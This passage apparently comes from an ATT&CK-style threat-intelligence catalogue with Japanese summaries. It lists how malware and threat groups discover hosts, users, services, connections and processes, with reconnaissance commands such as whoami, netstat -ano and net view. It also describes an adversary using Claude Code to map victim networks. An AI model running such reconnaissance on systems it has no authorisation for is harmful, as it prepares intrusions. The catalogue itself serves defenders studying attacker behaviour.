SpicyOmelette can identify payment systems, payment gateways, and ATM systems in compromised environments. QakBot can identify remote systems through the <code>net view</code> command. Diavol can use the ARP table to find remote hosts to scan. ROADTools can enumerate Azure AD systems and devices. SILENTTRINITY can enumerate and collect the properties of domain computers. DRATzarus can search for other machines connected to compromised host and attempt to map the network. Flagpro has been used to execute <code>net view</code> on a targeted system. HermeticWizard can find machines on the local network by gathering known local IP addresses through `DNSGetCacheDataTable`, `GetIpNetTable`,`WNetOpenEnumW(RESOURCE_GLOBALNET, RESOURCETYPE_ANY)`,`NetServerEnum`,`GetTcpTable`, and `GetAdaptersAddresses.` FunnyDream can collect information about hosts on the victim network. BlackCat can broadcasts NetBIOS Name Service (NBNC) messages to search for servers connected to compromised networks. Black Basta can use LDAP queries to connect to AD and iterate over connected workstations. BADHATCH can use a PowerShell object such as, `System.Net.NetworkInformation.Ping` to ping a computer. MgBot includes modules for performing ARP scans of local connected systems. DUSTTRAP can use `ping` to identify remote hosts within the victim network. Gomir probes arbitrary network endpoints for TCP connectivity. RansomHub can enumerate all accessible machines from the infected system. Havoc features a module capable of host enumeration. Qilin can enumerate domain-connected hosts during its discovery phase. LODEINFO can run `net view` and `net view /domain` for network discovery. 敵対者は、ログインユーザーや所有者情報を探索することがある。 Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. システム所有者/ユーザーの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors used Empire to enumerate hosts and gather username, machine name, and administrative permissions information. During Night Dragon, threat actors used password cracking and pass-the-hash tools to discover usernames and passwords. During Operation CuckooBees, the threat actors used the `query user` and `whoami` commands as part of their advanced reconnaissance. During Operation Wocao, threat actors enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system. During C0017, APT41 used `whoami` to gather information from victim machines. During C0018, the threat actors collected `whoami` information via PowerShell scripts. During SharePoint ToolShell Exploitation, threat actors executed `whoami` on victim machines to enumerate user context and validate privilege levels. During Operation Digital Eye, threat actors used `GetUserInfo` to identify current user information. Ke3chang has used implants capable of collecting the signed-in username. An APT3 downloader uses the Windows command <code>"cmd.exe" /C whoami</code> to verify that it is running with the elevated privileges of “System.” Threat Group-3390 has used `whoami` to collect system user information. Various Lazarus Group malware enumerates logged-on users. Sandworm Team has collected the username from a compromised host. Dragonfly used the command <code>query user</code> on victim hosts. Stealth Falcon malware gathers the registered user and primary owner name via WMI. Patchwork collected the victim username and whether it was running as admin, then sent the information to its C2 server. FIN7 has used the command `cmd.exe /C quser` to collect user session information. A Gamaredon Group file stealer can gather the victim's username to send to a C2 server. OilRig has run <code>whoami</code> on a victim. APT32 collected the victim's username and executed the <code>whoami</code> command on the victim's machine. APT32 executed shellcode to collect the username on the victim's machine. FIN10 has used Meterpreter to enumerate users on remote systems. Magic Hound malware has obtained the victim username and sent it to the C2 server. FIN8 has executed the command `quser` to display the session details of a compromised machine. APT37 identifies the victim username. MuddyWater has used malware that can collect the victim’s username. APT19 used an HTTP malware variant and a Port 22 malware variant to collect the victim’s username. Tropic Trooper used <code>letmein</code> to scan for saved usernames on the target system. APT38 has identified primary users, currently logged in users, sets of users that commonly use a system, or inactive users. APT39 used Remexi to collect usernames from the system. GALLIUM used <code>whoami</code> and <code>query user</code> to obtain information about the victim user. Kimsuky has gathered the identity of the user by querying `System.Security.Principal` namespace using the `GetCurrent()` method. APT41 has executed <code>whoami</code> commands, including using the WMIEXEC utility to execute this on remote machines. Wizard Spider has used "whoami" to identify the local user and their privileges. Windshift has used malware to identify the username on a compromised host. Chimera has used the <code>quser</code> command to show currently logged on users. Sidewinder has used tools to identify the user of a compromised host. HAFNIUM has used `whoami` to gather user information. ZIRCONIUM has used a tool to capture the username on a compromised host in order to register it with C2. Aquatic Panda gathers information on recently logged-in users on victim devices. HEXANE has run `whoami` on compromised machines to identify the current user. Earth Lusca collected information on user accounts via the <code>whoami</code> command. LuminousMoth has used a malicious DLL to collect the username from compromised hosts. Volt Typhoon has used public tools and executed the PowerShell command `Get-EventLog security -instanceid 4624` to identify associated user and computer account names. Winter Vivern PowerShell scripts execute `whoami` to identify the executing user. Moonstone Sleet deployed various malware such as YouieLoader that can perform system user discovery actions. Storm-1811 has used `whoami.exe` to determine if the active user on a compromised system is an administrator. Medusa Group has utilized PsExec to execute `quser` to discover the user session information. MirrorFace has used Windows native tools to enumerate user information. PlugX has the ability to gather the username from the victim’s machine. Ixeshe collects the username from the victim’s machine. BISCUIT has a command to gather the username from the system. A Linux version of Derusbi checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. Derusbi also gathers the username of the victim. Dyre has the ability to identify the users on a compromised host. SslMM sends the logged-on username to its hard-coded C2. WinMM uses NetUser-GetInfo to identify that it is running under an “Admin” account on the local system. Sys10 collects the account name of the logged-in user and sends it to the C2. Mis-Type runs tests to determine the privilege level of the compromised user. S-Type has run tests to determine the privilege level of the compromised user. Epic collects the user name from the victim’s machine. Agent.btz obtains the victim username and saves it to a file. Backdoor.Oldrea collects the current username from the victim. Trojan.Karagany can gather information about the user on a compromised host. T9000 gathers and beacons the username of the logged in account during installation. It will also gather the username of running processes to determine if it is running as SYSTEM. A module in Prikormka collects information from the victim about the current user name. Crimson can identify the user on a targeted system. Remsec can obtain information about the current user. Unknown Logger can obtain information about the victim usernames. PowerDuke has commands to get the current user's name and SID. RTM can obtain the victim username and permissions. MoonWind obtains the victim username. RedLeaves can obtain information about the logged on user both locally and for Remote Desktop sessions. WINDSHIELD can gather the victim user name. XAgentOSX contains the getInfoOSX function to return the OS X version as well as the current user. The OsInfo function in Komplex collects the current running username. Gazer obtains the current user's security identifier. Felismus collects the current username and sends it to the C2 server. Reaver collects the victim's username. POWRUNER may collect information about the currently logged in user by running <code>whoami</code> on a victim. DownPaper collects the victim username and sends it to the C2 server. Pupy can enumerate local information for Linux hosts and find currently logged on users for Windows hosts. JPIN can obtain the victim user name. can collect the victim user name. WINERACK can gather information on the victim username. POWERSTATS has the ability to identify the username on the compromised host. NanHaiShu collects the username from the victim. Kwampirs collects registered owner details by using the commands <code>systeminfo</code> and <code>net config workstation</code>. GravityRAT collects the victim username along with other account information (account type, description, full name, SID and status). ROKRAT can collect the username from a compromised host. RATANKBA runs the <code>whoami</code> and <code>query user</code> commands. SynAck gathers user names from infected hosts. yty collects the victim’s username. Gold Dragon collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server. Koadic can identify logged in users across the domain and views user sessions. Zebrocy gets the username from the system. Mosquito runs <code>whoami</code> on the victim’s machine. VERMIN gathers the username from the victim’s machine. RGDoor executes the <code>whoami</code> on the victim’s machine. InvisiMole lists local users and session information. QuasarRAT can enumerate the username and account type. Kazuar gathers information on users. TrickBot can identify the user and groups the user belongs to on a compromised host. FELIXROOT collects the username from the victim’s machine. QUADAGENT gathers the victim username. RogueRobin collects the victim’s username and whether that user is an admin. NDiskMonitor obtains the victim username and encrypts the information to send over its C2 channel. UPPERCUT has the capability to collect the current logged on user’s username from a machine. MirageFox can gather the username from the victim’s machine. More_eggs has the capability to gather the username from the victim's machine. Agent Tesla can collect the username from the victim’s machine. Remcos can enumerate the username on targeted hosts. DarkComet gathers the username from the victim’s machine. Micropsia collects the username from the victim’s machine. Octopus can collect the username from the victim’s machine. Azorult can collect the username from the victim’s machine. Cardinal RAT can collect the username from a victim machine. zwShell can obtain the name of the logged-in user on the victim. Cannon can gather the username from the system. NOKKI can collect the username from the victim’s machine. Denis enumerates and collects the username from the victim’s machine. KONNI can collect the username from the victim’s machine. Linux Rabbit opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain. Empire can enumerate the username on targeted hosts. Emotet has enumerated all users connected to network shares. SpeakUp uses the <code>whoami</code> command. Revenge RAT gathers the username from the system. FlawedAmmyy enumerates the current user during the initial infection. ServHelper will attempt to enumerate the username of the victim. njRAT enumerates the current user during the initial infection. HAWKBALL can collect the user name of the system. Exaramel for Linux can run <code>whoami</code> to identify the system owner. ZxShell can collect the owner and organization information from the target workstation. BabyShark has executed the <code>whoami</code> command. PoetRAT sent username, computer name, and the previously generated UUID in reply to a "who" command from C2. HotCroissant has the ability to collect the username on the infected host. Rifdoor has the ability to identify the username on the compromised host. Okrum can collect the victim username. PowerShower has the ability to identify the current user on the infected host. Lokibot has the ability to discover the username on the infected host. Rising Sun can detect the username of the infected host. SHARPSTATS has the ability to identify the username on the compromised host. Metamorfo has collected the username from the victim's machine. Aria-body has the ability to identify the username on a compromised host. MechaFlounder has the ability to identify the username and hostname on a compromised host. Get2 has the ability to identify the current username of an infected host. SDBbot has the ability to identify the user on a compromised host. Valak can gather information regarding the user. Goopy has the ability to enumerate the infected system's user name. Bonadan has discovered the username of the user running the backdoor. Cryptoistic can gather data on the user of a compromised host. LiteDuke can enumerate the account name on a targeted system. WellMess can collect the username on the victim machine to send to C2. WellMail can identify the current username on the victim system. BloodHound can collect information on user sessions. Grandoreiro can collect the username from the victim's machine. Lucifer has the ability to identify the username on a compromised host. SLOTHFULMEDIA has collected the username from a victim machine. Bazar can identify the username of the infected user. Spark has run the whoami command and has a built-in command to identify the user logged in. Egregor has used tools to gather information about users. SUNBURST collected the username from a compromised host. EVILNUM can obtain the username from the victim's machine. Explosive has collected the username from the infected host. Caterpillar WebShell can obtain a list of user accounts from a victim's machine. NBTscan can list active users on the system. ShadowPad has collected the username of the victim system. SideTwist can collect the username on a targeted system. SombRAT can execute <code>getinfo</code> to identify the username on a compromised host. SodaMaster can identify the username on a compromised host. Chaes has collected the username and UID from the infected machine. GrimAgent can identify the user id on a target machine. BoomBox can enumerate the username on a compromised host. ObliqueRAT can check for blocklisted usernames on infected endpoints. Turian can retrieve usernames. SMOKEDHAM has used <code>whoami</code> commands to identify system owners. QakBot can identify the user name on a compromised system. MarkiRAT can retrieve the victim’s username. BLUELIGHT can collect the username on a compromised host. Diavol can collect the username from a compromised host. Clambling can identify the username on a compromised host. RCSession can gather system owner information, including user and administrator privileges. SysUpdate can collect the username from a compromised host. Gelsemium has the ability to distinguish between a standard user and an administrator on a compromised host. Chrommme can retrieve the username from a targeted system. DarkWatchman has collected the username from a victim machine. LitePower can determine if the current user has admin privileges. Lizar can collect the username from the system. Neoichor can collect the user name from a victim's machine. SILENTTRINITY can gather a list of logged on users. DRATzarus can obtain a list of users from an infected machine. Flagpro has been used to run the <code>whoami</code> command on the system. ZxxZ can collect the username from a compromised host. Milan can identify users registered to a targeted machine. MacMa can collect the username from the compromised machine. Saint Bot can collect the username from a compromised host. DnsSystem can use the Windows user name to create a unique identification for infected users and systems. CreepySnail can execute `getUsername` on compromised systems. Amadey has collected the user name from a compromised host using `GetUserNameA`. Action RAT has the ability to collect the username from an infected host. AuTo Stealer has the ability to collect the username from an infected host. Squirrelwaffle can collect the user name from a compromised host. PyDCrypt has probed victim machines with <code>whoami</code> and has collected the username from the machine. StrifeWater can collect the user name from the victim's machine. Small Sieve can obtain the id of a logged in user. STARWHALE can gather the username from an infected host. Bumblebee has the ability to identify the user name. FunnyDream has the ability to gather user information from the targeted system using `whoami/upn&whoami/fqdn&whoami/logonid&whoami/all`. metaMain can collect the username from a compromised host. Mafalda can collect the username from a compromised host. SVCReady can collect the username from an infected host. Woody RAT can retrieve a list of user accounts and usernames from an infected machine. BlackCat can utilize `net use` commands to discover the user name on a compromised host. KOPILUWAK can conduct basic network reconnaissance on the victim machine with `whoami`, to get user details. BADHATCH can obtain logged user information from a compromised machine and can execute the command `whoami.exe`. AsyncRAT can check if the current user of a compromised system is an administrator. NGLite will run the <code>whoami</code> command to gather system information and return this to the command and control server. SocGholish can use `whoami` to obtain the username from a compromised host. Raspberry Robin determines whether it is successfully running on a victim system by querying the running account information to determine if it is running in Session 0, indicating running with elevated privileges. LunarWeb can collect user information from the targeted host. MgBot includes modules for identifying local users and administrators on victim machines. Nightdoor gathers information on victim system users and usernames. Raccoon Stealer gathers information on the infected system owner and user. CHIMNEYSWEEP has included the victim's computer name and username in C2 messages sent to actor-owned infrastructure. Cuckoo Stealer can discover and send the username from a compromised host to C2. Latrodectus can discover the username of an infected host. Mango can collect the user name from a compromised system which is used to create a unique victim identifier. OilBooster can identify the compromised system's username which is then used as part of a unique identifier. XLoader can identify the username from a victim machine. BOOKWORM has obtained the username from an infected host. PUBLOAD has obtained the username from an infected host. Havoc can trigger exection of `whoami` on the target host to display the current user. TONESHELL has obtained the username from an infected host. RedLine Stealer has obtained the username from the victim’s machine. InvisibleFerret has identified the user’s UUID and username through the "pay" module. XORIndex Loader has collected the username from the victim host. HexEval Loader has collected the username from the victim host. PureCrypter can retrieve the username from targeted machines. LODEINFO can identify the associated username on targeted machines. HiddenFace can collect the username associated with the compromised host. IronWind can enumerate the username on victim's systems. LAMEHUG can use `whoami` to enumerate the system user. RustyWater has gathered the victim machine’s username. 敵対者は、ネットワークトラフィックを盗聴して情報を取得することがある。 Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. アカウントの作成・権限・ライフサイクルを適切に管理する。 ネットワークを分割し、横展開や影響範囲を限定する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 機微情報を暗号化し、窃取時の影響を軽減する。 ネットワークスニッフィングに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy’s network sniffer module to discover user credentials being sent over the network between the local LAN and the power grid’s industrial control systems. ArcaneDoor included network packet capture and sniffing for data collection in victim environments. During RedPenguin, UNC3886 used a passive backdoor to act as a libpcap-based packet sniffer. APT28 deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials. APT28 close-access teams have used Wi-Fi pineapples to intercept Wi-Fi signals and user credentials. Sandworm Team has used intercepter-NG to sniff passwords in network traffic. APT33 has used SniffPass to collect credentials by sniffing network traffic. Kimsuky has used the Nirsoft SniffPass network sniffer to obtain passwords sent over non-secure protocols. DarkVishnya used network sniffing to obtain login data. Salt Typhoon has used a variety of tools and techniques to capture packet data between network interfaces. Velvet Ant has used a custom tool, "VELVETTAP", to perform packet capture from compromised F5 BIG-IP devices. UNC3886 has used the LOOKOVER sniffer to sniff TACACS+ authentication packets. Regin appears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB. Responder captures hashes and credentials that are sent to the system after the name services have been poisoned. Impacket can be used to sniff network traffic via an interface or raw socket. Empire can be used to conduct packet captures on target hosts. Emotet has been observed to hook network APIs to monitor network traffic. PoshC2 contains a module for taking packet captures on compromised hosts. MESSAGETAP uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata. Penquin can sniff network traffic to look for packets matching specific conditions. NBTscan can dump and print whole packet content. FoggyWeb can configure custom listeners to passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor. VersaMem hooked the Catalina application filter chain `doFilter` on compromised systems to monitor all inbound requests to the local Tomcat web server, inspecting them for parameters like passwords and follow-on Java modules. Line Dancer can create and exfiltrate packet captures from compromised environments. J-magic has a pcap listener function that can create an Extended Berkley Packet Filter (eBPF) on designated interfaces and ports. cd00r can use the libpcap library to monitor captured packets for specifc sequences. JumbledPath has the ability to perform packet capture on remote devices via actor-defined jump-hosts. CASTLETAP has the ability to create a raw promiscuous socket to sniff network traffic. SPAWNCHIMERA has monitored and filtered network traffic on compromised edge devices, allowing legitimate traffic to pass while redirecting attacker-controlled traffic to infrastructure under adversary control. 敵対者は、ネットワークサービス（開放ポート等）を探索することがある。 Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port, vulnerability, and/or wordlist scans using tools that are brought onto a system. ネットワークを分割し、横展開や影響範囲を限定する。 ネットワーク侵入防止システム(IPS)で悪意ある通信を遮断する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 ネットワークサービスの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During CostaRicto, the threat actors employed nmap and pscan to scan target environments. During Operation Wocao, threat actors scanned for open ports and used nbtscan to find NETBIOS nameservers. During C0018, the threat actors used the SoftPerfect Network Scanner for network scanning. During C0027, used RustScan to scan for open ports on targeted ESXi appliances. During HomeLand Justice, threat actors executed the Advanced Port Scanner tool on compromised systems. During the Anthropic AI-orchestrated Campaign, the adversary used Claude Code to enumerate internal network services and endpoints across targeted environments using browser automation via MCP, including databases, container registries, admin interfaces, and workflow orchestration platforms. During the 2025 Poland Wiper Attacks, the adversaries utilized Ping, the Advanced Port Scanner and Advanced IP Scanner to enumerate network devices. Naikon has used the LadonGo scanner to scan target networks. Threat Group-3390 actors use the Hunter tool to conduct network service discovery for vulnerable systems. Lotus Blossom has used port scanners to enumerate services on remote hosts. Lazarus Group has used nmap from a router VM to scan ports on systems within the restricted segment of an enterprise network. FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS. Suckfly the victim's internal network for hosts with ports 8080, 5900, and 40 open. menuPass has used tcping.exe, similar to Ping, to probe port status on systems of interest. OilRig has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning. APT32 performed network scanning on the network to search for open ports, services, OS finger-printing, and other vulnerabilities. Magic Hound has used KPortScan 3.0 to perform SMB, RDP, and LDAP scanning. Leafminer scanned network services to search for vulnerabilities in the victim system. Cobalt Group leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning. Tropic Trooper used <code>pr</code> and an openly available tool to scan for open ports on target systems. APT39 has used CrackMapExec and a custom port scanner known as BLUETORCH for network scanning. APT41 used a malware variant called WIDETONE to conduct port scans on specified subnets. BlackTech has used the SNScan tool to find other potential targets on victim networks. DarkVishnya performed port scanning to obtain the list of active services. Rocke conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers. Chimera has used the <code>get -b <start ip> -e <end ip> -p</code> command for network scanning as well as a custom Python tool packed into a Windows executable named Get.exe to scan IP ranges for HTTP. Fox Kitten has used tools including NMAP to conduct broad scanning to identify open ports. Mustang Panda has leveraged NBTscan to scan IP networks. BackdoorDiplomacy has used SMBTouch, a vulnerability scanner, to determine whether a target is vulnerable to EternalBlue malware. TeamTNT has used masscan to search for open Docker API ports and Kubernetes clusters. TeamTNT has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments. Ember Bear has used tools such as NMAP for remote system discovery and enumeration in victim environments. FIN13 has utilized `nmap` for reconnaissance efforts. FIN13 has also scanned for internal MS-SQL servers in a compromised network. Volt Typhoon has used commercial tools, LOTL utilities, and appliances already present on the system for network service discovery. Agrius used the open-source port scanner <code>WinEggDrop</code> to perform detailed scans of hosts of interest in victim networks. INC Ransom has used NETSCAN.EXE for internal reconnaissance. RedCurl has used netstat to check if port 4119 is open. BlackByte has used tools such as NetScan to enumerate network services in victim environments. Medusa Group has the capability to use living off the land (LOTL) binaries to perform network enumeration. Medusa Group has also utilized the publicly available scanning tool SoftPerfect Network Scanner (`netscan.exe`) to discover device hostnames and network services. China Chopper's server component can spider authentication portals. HDoor scans to identify open ports on the victim. BlackEnergy has conducted port scans on a host. Backdoor.Oldrea can use a network scanning module to identify ICS-related ports. XTunnel is capable of probing the network for open ports. Remsec has a plugin that can perform ARP scanning as well as port scanning. Cobalt Strike can perform port scans from an infected host. Pupy has a built-in module for port scanning. MURKYTOP has the capability to scan for open ports on hosts in a connected network. Koadic can scan for open TCP ports on the target network. InvisiMole can scan the network for open ports and vulnerable instances of RDP and SMB protocols. Xbash can perform port scanning of TCP and UDP ports. Empire can perform port scans from an infected host. SpeakUp checks for availability of specific ports on servers. PoshC2 can perform port scans from an infected host. ZxShell can launch port scans. Ramsay can scan for systems that are vulnerable to the EternalBlue exploit. Lucifer can scan for open ports including TCP ports 135 and 1433. Caterpillar WebShell has a module to use a port scanner on a system. Pysa can perform network reconnaissance using the Advanced Port Scanner tool. NBTscan can be used to scan IP networks. P.A.S. Webshell can scan networks for open ports and listening services. Hildegard has used masscan to look for kubelets in the internal Kubernetes network. Industroyer uses a custom port scanner to map out a network. Conficker scans for other machines to infect. Peirates can initiate a port scan against a given IP address. SILENTTRINITY can scan for open ports on a compromised machine. HermeticWizard has the ability to scan ports on a compromised network. Brute Ratel C4 can conduct port scanning against targeted systems. Royal can scan the network interfaces of targeted systems. BADHATCH can check for open ports on a computer by establishing a TCP connection. As part of load balancing FRP can set `healthCheck.type = "tcp"` or `healthCheck.type = "http"` to check service status on specific hosts with TCPing or an HTTP request. MgBot includes modules for performing HTTP and server service scans. BlackByte Ransomware identifies remote systems via active directory queries for hostnames prior to launching remote ransomware payloads. To collect data on the host's Wi-Fi connection history, LightSpy reads the `/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist file`.It also utilizes Apple's CWWiFiClient API to scan for nearby Wi-Fi networks and obtain data on the SSID, security type, and RSSI (signal strength) values. 敵対者は、現在のネットワーク接続を列挙して環境を把握することがある。 Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. システムネットワーク接続の探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During FunnyDream, the threat actors used netstat to discover network connections on remote systems. During Operation CuckooBees, the threat actors used the `net session`, `net use`, and `netstat` commands as part of their advanced reconnaissance. During Operation Wocao, threat actors collected a list of open connections on the infected system using `netstat` and checks whether it has an internet connection. During the Anthropic AI-orchestrated Campaign, the adversary used Claude Code to map internal network architecture and access relationships. During the 2025 Poland Wiper Attacks, the adversaries identified network connections utilizing `netstat -nao` and `netstat -r`. Ke3chang performs local network connection discovery using <code>netstat</code>. APT1 used the <code>net use</code> command to get a listing on network connections. Turla surveys a system upon check-in to discover active local network connections using the <code>netstat -an</code>, <code>net use</code>, <code>net file</code>, and <code>net session</code> commands. Turla RPC backdoors have also enumerated the IPv4 TCP connection table via the <code>GetTcpTable2</code> API call. admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to display network connections: <code>netstat -ano >> %temp%\download</code> APT3 has a tool that can enumerate current network connections. Threat Group-3390 has used `net use` and `netstat` to conduct internal discovery of systems. The group has also used `quser.exe` to identify existing RDP sessions on a victim. Lotus Blossom has used commands such as `netstat` to identify system network connections. Lazarus Group has used <code>net use</code> to identify and establish a network connection with a remote host. Poseidon Group obtains and saves information about victim network interfaces and addresses. Sandworm Team had gathered user, IP address, and server data related to RDP sessions on a compromised host. It has also accessed network diagram files useful for understanding how a host's network was configured. menuPass has used <code>net use</code> to conduct connectivity checks to machines. OilRig has used <code>netstat -an</code> on a victim to get a listing of network connections. APT32 used the <code>netstat -anpo tcp</code> command to display TCP connections on the victim's machine. Magic Hound has used quser.exe to identify existing RDP connections. MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine. Tropic Trooper has tested if the localhost network is available and other connection capability on an infected system using command scripts. APT38 installed a port monitoring tool, MAPMAKER, to print the active TCP connections on the local system. GALLIUM used <code>netstat -oan</code> to obtain information about the victim network connections. APT41 has enumerated IP addresses of network resources and used the <code>netstat</code> command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions. Chimera has used <code>netstat -ano | findstr EST</code> to discover network connections. Mustang Panda has used <code>netstat -ano</code> to determine network connection information. BackdoorDiplomacy has used NetCat and PortQry to enumerate network connections and display the status of related TCP and UDP ports. Andariel has used the <code>netstat -naop tcp</code> command to display TCP connections on a victim's machine. TeamTNT has run <code>netstat -anp</code> to search for rival malware connections. TeamTNT has also used `libprocesshider` to modify <code>/etc/ld.so.preload</code>. HEXANE has used netstat to monitor connections to specific ports. Earth Lusca employed a PowerShell script called RDPConnectionParser to read and filter the Windows event log “Microsoft-Windows-TerminalServices-RDPClient/Operational” (Event ID 1024) to obtain network information from RDP connections. Earth Lusca has also used netstat from a compromised system to obtain network connection information. FIN13 has used `netstat` and other net commands for network reconnaissance efforts. Volt Typhoon has used `netstat -ano` on compromised hosts to enumerate network connections. ToddyCat has used `netstat -anop tcp` to discover TCP connections to compromised hosts. APT5 has used the BLOODMINE utility to collect data on web requests from Pulse Secure Connect logs. INC Ransom has used RDP to test network connections. Velvet Ant has enumerated existing network connections on victim devices. PlugX has a module for enumerating TCP and UDP network connections and associated processes using the <code>netstat</code> command. Sykipot may use <code>netstat -ano</code> to display active network connections. The discovery modules used with Duqu can collect information on network connections. Commands such as <code>net use</code> and <code>net session</code> can be used in Net to gather information about network connections from a particular host. SHOTPUT uses netstat to list TCP connection status. BlackEnergy has gathered information about local network connections using netstat. Epic uses the <code>net use</code>, <code>net session</code>, and <code>netstat</code> commands to gather information on network connections. Trojan.Karagany can use netstat to collect a list of network connections. nbtstat can be used to discover current NetBIOS sessions. netstat can be used to enumerate local network connections, including active TCP connections and other network statistics. Remsec can obtain a list of active connections and open ports. RedLeaves can enumerate drives and Remote Desktop sessions. Cobalt Strike can produce a sessions report from compromised hosts. OSInfo enumerates the current network connections similar to <code> net use </code>. Volgmer can gather information about TCP connection state. POWRUNER may collect active network connections by running <code>netstat -an</code> on a victim. Pupy has a built-in utility command for <code>netstat</code>, can do net session through PowerView, and has an interactive shell which can be used to discover additional information. NETWIRE can capture session logon details from a compromised host. Kwampirs collects a list of active and listening connections by using the command <code>netstat -nao</code> as well as a list of available network mappings with <code>net use</code>. GravityRAT uses the <code>netstat</code> command to find open ports on the victim’s machine. RATANKBA uses <code>netstat -ano</code> to search for specific IP address ranges. Comnie executes the <code>netstat -ano</code> command. Zebrocy uses <code>netstat -aon</code> to gather network connection information. jRAT can list network connections. Carbon uses the <code>netstat -r</code> and <code>netstat -an</code> commands. KONNI has used <code>net session</code> on the victim's machine. Empire can enumerate the current network connections of a host. SpeakUp uses the <code>arp -a</code> command. PoshC2 contains an implementation of netstat to enumerate TCP and UDP connections. Okrum was seen using NetSess to discover NetBIOS sessions. After loading the keyword and phone data files, MESSAGETAP begins monitoring all network connections to and from the victim server. ShimRatReporter used the Windows function <code>GetExtendedUdpTable</code> to detect connected UDP endpoints. Maze has used the "WNetOpenEnumW", "WNetEnumResourceW”, “WNetCloseEnum” and “WNetAddConnection2W” functions to enumerate the network resources on the infected machine. USBferry can use <code>netstat</code> and <code>nbtstat</code> to detect active network connections. Aria-body has the ability to gather TCP and UDP table status listings. Ramsay can use <code>netstat</code> to enumerate network connections. CrackMapExec can discover active sessions for a targeted system. Lucifer can identify the IP and port numbers for all remote connections from the compromised host. SLOTHFULMEDIA can enumerate open ports on a victim machine. Egregor can enumerate all connected drives. Dtrack can collect network and active connection information. Conti can enumerate routine network connections from a compromised host. Waterbear can use API hooks on `GetExtendedTcpTable` to retrieve a table containing a list of TCP endpoints available to the application. Sibot has retrieved a GUID associated with a present LAN connection on a compromised machine. Cuba can use the function <code>GetIpNetTable</code> to recover the last connections to the victim's machine. Sliver can collect network connection information. Babuk can use “WNetOpenEnumW” and “WNetEnumResourceW” to enumerate files in network resources for encryption. QakBot can use <code>netstat</code> to enumerate current network connections. Torisma can use `WTSEnumerateSessionsW` to monitor remote desktop connections. Lizar has a plugin to retrieve information about all active network sessions on the infected server. Flagpro has been used to execute <code>netstat -ano</code> on a compromised host. PyDCrypt has used netsh to find RPC connections on remote machines. Mafalda can use the <code>GetExtendedTcpTable</code> function to retrieve information about established TCP connections. KOPILUWAK can use netstat, Arp, and Net to discover current TCP connections. BADHATCH can execute `netstat.exe -f` on a compromised machine. Sardonic has the ability to execute the `netstat` command. Once inside a Virtual Private Cloud, Pacu can attempt to identify DirectConnect, VPN, or VPC Peering. LunarWeb can enumerate system network connections. FRP can use a dashboard and U/I to display the status of connections from the FRP client and server. PUBLOAD has used several commands executed in sequence via `cmd` in a short interval to gather information on network connections. 敵対者は、稼働中のプロセスを列挙して環境を把握することがある。 Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. プロセスの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Frankenstein, the threat actors used Empire to obtain a list of all running processes. During Operation Honeybee, the threat actors obtained a list of running processes on a victim machine using `cmd /c tasklist > %temp%\temp.ini`. During FunnyDream, the threat actors used Tasklist on targeted systems. During Operation CuckooBees, the threat actors used the `tasklist` command as part of their advanced reconnaissance. During Operation Wocao, the threat actors used `tasklist` to collect a list of running processes on an infected system. During C0015, the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes. During the SolarWinds Compromise, APT29 used multiple command-line utilities to enumerate running processes. Scripts associated with KV Botnet Activity initial deployment can identify processes related to security tools and other botnet families for follow-on disabling during 